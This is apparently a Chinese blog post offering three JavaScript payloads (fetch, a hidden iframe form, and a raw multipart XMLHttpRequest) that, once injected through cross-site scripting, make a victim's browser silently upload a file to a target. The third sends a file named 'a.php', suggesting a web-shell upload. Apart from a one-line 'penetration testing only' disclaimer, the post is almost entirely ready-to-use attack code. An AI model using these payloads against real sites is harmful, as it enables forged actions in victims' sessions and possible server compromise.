使用XSS自动上传表单文件的例子

fjh19972024-05-12 20:55

仅供渗透测试,禁止他用

方案一:fetch

javascript 复制代码 
 let formData = new FormData();
formData.append('name', 'John');
formData.append('file', new Blob(['Hello World!\n']), 'test')
fetch("http://www.baidu,com",
  {
    body: formData, method: "post"
  });

方案二:iframe

javascript 复制代码 
	var Iframe=document.createElement("iframe")
Iframe.name="csrf-frame"
Iframe.style="display:none"
var Form = document.createElement("form");
Form.action = "http://www.baidu.com";
Form.method = "post";
Form.setAttribute("enctype", "multipart/form-data");
 
Form.target = "csrf-frame";
var Input= document.createElement("input");
Input.type='hidden'
Input.name='a'
Input.value='b'
 
const dataTransfer = new DataTransfer();
var fileInput= document.createElement("input");
 Form.appendChild(Input)
 document.body.appendChild(Iframe)
 
dataTransfer.items.add(
          new File(['Hello World!\n'], 'test', {
            type: 'application/octet-stream'
          })
        );
fileInput.setAttribute("name", "file");
 
 fileInput.setAttribute("type", "file");
 
 fileInput.files = dataTransfer.files;
Form.appendChild(fileInput)
var formToSubmit = document.body.appendChild(Form);
formToSubmit.submit();

方案三:

javascript 复制代码 
  if (XMLHttpRequest.prototype.sendAsBinary === undefined) {
  XMLHttpRequest.prototype.sendAsBinary = function(string) {
    var bytes = Array.prototype.map.call(string, function(c) {
        return c.charCodeAt(0) & 0xff;
    });
    this.send(new Uint8Array(bytes));
  };
}
  var boundary = '----ThisIsTheBoundary1234567890';
  var formData = '--' + boundary + '\r\n'
  formData += 'Content-Disposition: form-data; name="source"; filename="a.php"\r\n';
  formData += 'Content-Type: application/octet-stream\r\n\r\n';
  formData += 'Data';
  formData += '\r\n';
  formData += '--' + boundary + '\r\n';
  formData += 'Content-Disposition: form-data; name="message"\r\n\r\n';
  formData += 'message' + '\r\n'
  formData += '--' + boundary + '--\r\n';
 
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'haha', true);
  xhr.onload  = xhr.onerror  = function() {
      console.log(xhr.responseText);
  };
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  xhr.sendAsBinary(formData);
相关推荐
SEO_juper1 分钟前
谷歌 Web Guide 如何重塑搜索排名及其 SEO 影响
前端·搜索引擎·seo·geo·数字营销·seo优化·谷歌seo
子洋4 分钟前
Nginx 启用 NJS 与 QuickJS 支持
前端·后端·nginx
四七伵9 分钟前
MyBatis #{} 与 ${} 有什么区别?为什么预编译能防止SQL注入?
前端·sql·mybatis
袁煦丞10 分钟前
告别命令行焦虑Docker Compose UI:cpolar内网穿透实验室第570号成功挑战
前端·程序员·远程工作
ILUUSION_S15 分钟前
Vue接口平台小功能——发送报告到飞书
前端·vue.js·飞书
梦在深巷@130 分钟前
sqli-libs通关教程(41-50)
前端
学Java的bb8 小时前
JavaWeb-后端Web实战(IOC + DI)
前端
pe7er8 小时前
React Native 多环境配置全攻略:环境变量、iOS Scheme 和 Android Build Variant
前端·react native·react.js
柯北(jvxiao)8 小时前
Vue vs React 多维度剖析: 哪一个更适合大型项目?
前端·vue·react
JefferyXZF9 小时前
Next.js 中间件:掌握请求拦截与处理的核心机制(六)
前端·全栈·next.js
热门推荐
01全球最强模型Grok4,国内已可免费使用!(附教程)02UV安装并设置国内源03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04[已解决]VSCode右键菜单消失恢复052025最新国内服务器可用docker源仓库地址大全(2025年8月更新)06KGG转MP3工具|非KGM文件|解密音频07GPT-5 使用限制与国内升级全攻略(免费 / Plus / Pro)【2025 最新】08🚀Cursor CLI+GPT-5保姆级教程+编程能力测评!Cursor CLI零成本免费使用GPT-5!Claude Code的劲敌来了!从安装到实战演示09OpenAI重返开源!GPT-OSS本地部署完全指南10Cursor 终端“卡死/无响应”问题的解法